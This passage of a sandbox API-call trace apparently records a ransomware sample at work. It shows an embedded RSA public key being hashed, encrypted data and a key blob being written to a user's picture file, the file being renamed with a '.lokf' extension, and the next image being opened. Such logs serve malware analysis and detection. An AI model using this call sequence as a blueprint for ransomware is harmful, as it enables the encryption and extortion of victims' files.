KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.082] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.082] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.083] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.083] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.083] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.083] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.083] GetLastError () returned 0x0 [0059.083] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.083] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.083] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.083] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.083] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.084] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b418 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b400 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.084] GetCurrentThreadId () returned 0x9e0 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7dad8 [0059.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.085] GetCurrentThreadId () returned 0x9e0 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b400 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.085] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.085] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b418 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3e8 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b430 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b400 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.086] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b400 | out: hHeap=0x660000) returned 1 [0059.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b418 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83190 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.087] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.088] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x66f7, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x66f7, lpOverlapped=0x0) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.088] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x66fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.088] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.088] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.088] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.089] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.089] CloseHandle (hObject=0x5cc) returned 1 [0059.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.089] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.089] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B DJ6bHqinsD9h4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b dj6bhqinsd9h4.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B DJ6bHqinsD9h4.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b dj6bhqinsd9h4.bmp.lokf")) returned 1 [0059.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.090] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.091] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a851d00, ftCreationTime.dwHighDateTime=0x1d4cee2, ftLastAccessTime.dwLowDateTime=0xa52268c0, ftLastAccessTime.dwHighDateTime=0x1d4c686, ftLastWriteTime.dwLowDateTime=0xa52268c0, ftLastWriteTime.dwHighDateTime=0x1d4c686, nFileSizeHigh=0x0, nFileSizeLow=0xfbf5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b7pJttHK9Z.jpg", cAlternateFileName="B7PJTT~1.JPG")) returned 1 [0059.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.091] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.091] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\b7pJttHK9Z.jpg") returned=".jpg" [0059.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\b7pJttHK9Z.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b7pjtthk9z.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.091] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=64501) returned 1 [0059.091] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.094] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfbcf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.094] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.094] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.094] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.094] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xfbf5, lpOverlapped=0x0) returned 1 [0059.095] lstrlenA (lpString="-----BEGIN PUBLIC 